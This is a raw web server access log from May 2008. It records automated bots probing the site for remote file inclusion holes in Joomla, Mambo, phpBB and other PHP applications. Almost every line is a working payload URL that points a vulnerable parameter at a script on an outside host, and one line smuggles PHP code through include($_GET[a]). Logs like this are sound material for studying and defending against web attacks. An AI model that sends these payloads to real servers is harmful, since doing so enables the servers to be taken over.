85.25.145.85 - - [06/May/2008:11:46:02 -0700] "GET /logs/access_080205.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://castel.ueuo.com/new.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:46:03 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:46:12 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:46:13 -0700] "GET /xGB.php?act=admin&do=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:46:13 -0700] "GET /logs/xGB.php?act=admin&do=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:46:17 -0700] "GET /logs/access_080123.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.220.82 - - [06/May/2008:11:46:21 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.190.166.39 - - [06/May/2008:11:46:29 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://vanilla.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:46:32 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [06/May/2008:11:46:33 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:46:41 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:46:43 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:46:43 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:46:54 -0700] "GET //index2.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:11:46:54 -0700] "GET /logs//index2.php?option=com_remository&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.18.107 - - [06/May/2008:11:46:55 -0700] "GET /logs/access_070628.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:46:55 -0700] "GET /logs/access_080211.log/xGB.php?act=admin&do=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:46:55 -0700] "GET /xGB.php?act=admin&do=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:46:56 -0700] "GET /logs/xGB.php?act=admin&do=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:47:04 -0700] "GET /logs/access_080228.log/xGB.php?act=admin&do=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:47:24 -0700] "GET /logs/lib/gore.php?libpath=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:47:25 -0700] "GET /lib/gore.php?libpath=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:48:21 -0700] "GET /logs/access_080108.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:48:23 -0700] "GET /logs/access_080201.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:11:48:29 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.geocities.com/agung_skater/agung.html?? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.246.28 - - [06/May/2008:11:48:31 -0700] "GET /logs/access_080225.log/faqsupport/include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.67.192 - - [06/May/2008:11:48:35 -0700] "GET /logs/access_080204.log/calendar.php?s=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:49:00 -0700] "GET /logs/access_080127.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:50:11 -0700] "GET /!scanhttp://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:50:16 -0700] "GET /logs/index/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:50:16 -0700] "GET /index/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:11:50:18 -0700] "GET /index2.php?x=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:50:19 -0700] "GET /!scanhttp://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:50:26 -0700] "GET /logs/access_080211.log/!scanhttp://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:50:27 -0700] "GET /logs/!scanhttp://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:50:29 -0700] "GET /logs/access_080110.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:11:50:29 -0700] "GET /logs/access_080228.log/!scanhttp://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.211.138 - - [06/May/2008:11:50:59 -0700] "GET /logs/access.log/index.php?pag=http://201.6.243.67/UP/xs.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:51:04 -0700] "GET /logs///?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 46275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.221.191.24 - - [06/May/2008:11:51:09 -0700] "GET ///?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:11:51:18 -0700] "GET /logs/index1.php?dat=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:11:51:19 -0700] "GET /index1.php?dat=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.56.80 - - [06/May/2008:11:51:23 -0700] "GET /xGB.php?act=admin&do=http://root.fileave.com/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:51:27 -0700] "GET /logs/access_071225.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.225.246.28 - - [06/May/2008:11:51:37 -0700] "GET /logs/access_080309.log/faqsupport/include.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:11:51:40 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:11:51:40 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:11:51:40 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:11:51:48 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:11:51:49 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.105.42 - - [06/May/2008:11:51:49 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.107.66.224 - - [06/May/2008:11:52:08 -0700] "GET /logs/access_080126.log//index.php?body=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:52:20 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:52:20 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:11:52:24 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:11:52:24 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.159.45.5 - - [06/May/2008:11:52:24 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:53:07 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:53:09 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:53:12 -0700] "GET /logs//home.php?content=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.75.158.23 - - [06/May/2008:11:53:12 -0700] "GET //home.php?content=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:53:15 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:53:16 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:11:53:17 -0700] "GET /logs//?pag=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 46274 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:11:53:17 -0700] "GET /logs//?p=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 46274 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:11:53:18 -0700] "GET /logs//?page=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 46274 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:11:53:27 -0700] "GET //?p=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:11:53:27 -0700] "GET //?pag=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [06/May/2008:11:53:33 -0700] "GET //?page=http://mfe-gay.de/safe.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:11:53:54 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:11:53:55 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:11:53:55 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:53:55 -0700] "GET /logs//home.php?content=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [06/May/2008:11:53:55 -0700] "GET //home.php?content=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:11:53:58 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:11:53:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
131.128.169.79 - - [06/May/2008:11:53:58 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:54:09 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:54:10 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:54:10 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:54:10 -0700] "GET /logs/SQuery/lib/gore.php?libpath=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.3.132 - - [06/May/2008:11:54:11 -0700] "GET /SQuery/lib/gore.php?libpath=http://n3bunel.ath.cx/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:11:54:24 -0700] "GET /logs/index1.php?dat=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.67.26.84 - - [06/May/2008:11:54:24 -0700] "GET /index1.php?dat=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.54.9.218 - - [06/May/2008:11:54:35 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:54:38 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:54:38 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:54:39 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:54:45 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:54:45 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:11:54:45 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:11:54:51 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:11:54:51 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.17.101.27 - - [06/May/2008:11:54:51 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:11:55:01 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:11:55:02 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:55:05 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:55:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.76.134 - - [06/May/2008:11:55:06 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
85.214.26.250 - - [06/May/2008:11:55:12 -0700] "GET /logs/access_080218.log/joomla/index.php?option=com_restaurante&task=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:55:15 -0700] "GET /logs/access_080130.log/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:55:15 -0700] "GET /include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.173.45 - - [06/May/2008:11:55:16 -0700] "GET /logs/include/common_function.php?_config[site_path]=http://www.rehau-trocal.ru/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:11:55:19 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:11:55:19 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [06/May/2008:11:55:19 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:11:55:29 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:11:55:29 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [06/May/2008:11:55:29 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:55:56 -0700] "GET /logs/?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 46269 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:11:55:57 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:11:55:57 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.212.182 - - [06/May/2008:11:55:57 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.diabeteszones.com/media/.help/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:11:56:00 -0700] "GET /?mosConfig_absolute_path=http://www.i-promo.info/test.txt? HTTP/1.1" 200 11606 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
69.72.215.178 - - [06/May/2008:11:56:02 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [06/May/2008:11:56:02 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.omegadm.co.uk/new/fdfffffffffffff/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
